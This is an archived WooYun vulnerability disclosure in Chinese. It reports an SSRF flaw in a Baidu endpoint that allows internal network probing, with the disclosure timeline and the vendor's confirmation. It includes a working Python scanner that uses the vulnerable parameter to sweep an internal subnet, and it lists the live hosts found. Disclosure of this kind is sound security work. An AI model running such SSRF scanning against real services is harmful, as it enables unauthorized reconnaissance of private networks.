乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-27: 细节已通知厂商并且等待厂商处理中 2014-11-27: 厂商已经确认,细节仅向厂商公开 2014-12-07: 细节向核心白帽子及相关领域专家公开 2014-12-17: 细节向普通白帽子公开 2014-12-27: 细节向实习白帽子公开 2015-01-11: 细节向公众公开
百度一处可探内网鸡肋SSRF(附验证脚本)
SSRF位于:
http://tuanbai.baidu.com/apiCheckv1/?url=http://10.42.7.78
HTTP Status 200,会返回
从API 获取数据不符合我们规定的XML格式!
非200的其他情况,返回
从API 获取数据失败!失败原因可能有:1、api所在的服务器发生故障;2、从api获取数据超时(>10s)。3、api 的url设置了redirect。
扫描10.42.7.1/24这个内网C段开放80,8080,8888端口HTTP服务的主机,得到:
D:\ssrf>baidu_ssrf.py. . .[Alive] http://10.42.7.18:80/. . . . . . .. .. . . .[Alive] http://10.42.7.24:80/. . . . . . . . . . . . . . . . . . . . .. . . .[Alive] http://10.42.7.54:80/.[Alive] http://10.42.7.57:80/. . . . . . . . . . . . . . . . . .[Alive] http://10.42.7.65:80/. . . . . . .[Alive] http://10.42.7.78:80/. . . . . . . . .[Alive] http://10.42.7.86:80/. . . . . . . . . . . .[Alive] http://10.42.7.100:80/. . .[Alive] http://10.42.7.104:80/. . . . . . . . . . . . . . . . . . . .[Alive] http://10.42.7.113:80/. . . . . . . . . . . . .[Alive] http://10.42.7.124:80/. . . . . . .[Alive] http://10.42.7.136:80/. .[Alive] http://10.42.7.139:80/. . . .[Alive] http://10.42.7.143:80/. . .[Alive] http://10.42.7.145:80/. . .[Alive] http://10.42.7.147:80/[Alive] http://10.42.7.151:80/. . .[Alive] http://10.42.7.156:80/. . .[Alive] http://10.42.7.158:80/[Alive] http://10.42.7.161:80/. . . . . . . . .[Alive] http://10.42.7.168:80/[Alive] http://10.42.7.169:80/. . . . . .[Alive] http://10.42.7.173:80/. . . . . .[Alive] http://10.42.7.187:80/. . . . . .[Alive] http://10.42.7.191:80/[Alive] http://10.42.7.192:80/. . .[Alive] http://10.42.7.196:80/. . . .[Alive] http://10.42.7.195:80/[Alive] http://10.42.7.199:80/. .[Alive] http://10.42.7.203:80/. .[Alive] http://10.42.7.206:80/. . . . . . . . .[Alive] http://10.42.7.219:80/. . . .[Alive] http://10.42.7.217:80/. . . . . .[Alive] http://10.42.7.232:80/. . . . . . . . . . . . . . . . . . . . . . . . .[Alive] http://10.42.7.156:8080/. . . . . . . All Done
python脚本附上:
#encoding=gbkimport httplibimport threadingimport Queuelock = threading.Lock()queue = Queue.Queue()def scan_http_service(): while True: try: item = queue.get(timeout=1.0) except: break for i in range(3): try: conn = httplib.HTTPConnection('tuanbai.baidu.com', timeout=3) url = 'http://%s:%s/' % (item['ip'], item['port']) conn.request('GET', '/apiCheckv1/?url=' + url) html_doc = conn.getresponse().read().decode('gbk') conn.close() if html_doc.find(u'从API 获取数据不符合我们规定的XML格式') >= 0: lock.acquire() print '\n[Alive]',url lock.release() break else: print '.', except Exception, e: passfor port in [80, 8080, 8888]: for i in range(1, 256): queue.put({'ip': '10.42.7.%s' % i, 'port': port})threads = []for i in range(10): t = threading.Thread(target=scan_http_service) t.start() threads.append(t)for t in threads: t.join() print 'All Done'
对请求目标过滤
危害等级:中
漏洞Rank:7
确认时间:2014-11-27 18:00
感谢提交,已通知业务部门处理
暂无
